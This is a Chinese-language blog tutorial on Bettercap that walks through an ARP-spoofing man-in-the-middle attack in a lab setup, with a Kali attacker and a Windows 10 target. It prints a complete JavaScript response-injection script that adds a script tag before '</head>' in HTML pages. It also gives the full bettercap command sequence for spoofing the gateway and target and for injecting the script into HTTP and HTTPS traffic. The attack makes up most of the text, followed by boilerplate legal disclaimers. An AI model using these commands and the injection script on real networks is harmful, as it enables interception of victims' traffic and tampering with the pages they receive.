Bettercap使用教程-FancyPig's blog

0x00 目标

模拟arp欺骗，修改靶机IP的http和https返回包。

0x01 测试环境

名称

IP

备注

攻击

192.168.2.x

虚拟机 kali

靶机

192.168.2.x

客户机 win10

0x02 测试步骤

在kali /home/test 目录下写一个js脚本

function onResponse(req,res){
    if(res.ContentType.indexOf('text/html')==0){
        var body=res.ReadBody();
        if(body.indexOf('</head>')!=-1){
            res.Body=body.replace(
                '</head>',
               '<script type="text/javascript">alert("your computer has hacked!")</script></head>'
            );
            }
        }
}

启动bettercap
设置攻击目标
set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标，这里欺骗的是网关和目标机器

set http.proxy.script /home/test/1.js #往http流量中注入脚本

set https.proxy.script /home/test/1.js #往https流量中注入脚本

http.proxy on #开启HTTP代理

https.proxy on #开启HTTPS代理

arp.spoof on #开启ARP欺骗
靶机访问http,https网站

遵守网络安全法，请勿未经授权进行测试

相关声明 1 微信公众号：猪猪安全
2 本站永久网址：https://www.iculture.cc
3 本文内容仅为技术科普，请勿用于非法用途
4 本文内容未隐讳任何个人、群体、公司。非文学作品，请勿用于阅读理解的练习
5 根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途
6 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责

THE END